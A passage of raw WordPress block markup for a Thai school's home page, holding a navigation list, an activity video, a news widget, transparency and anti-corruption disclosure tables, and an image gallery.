kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 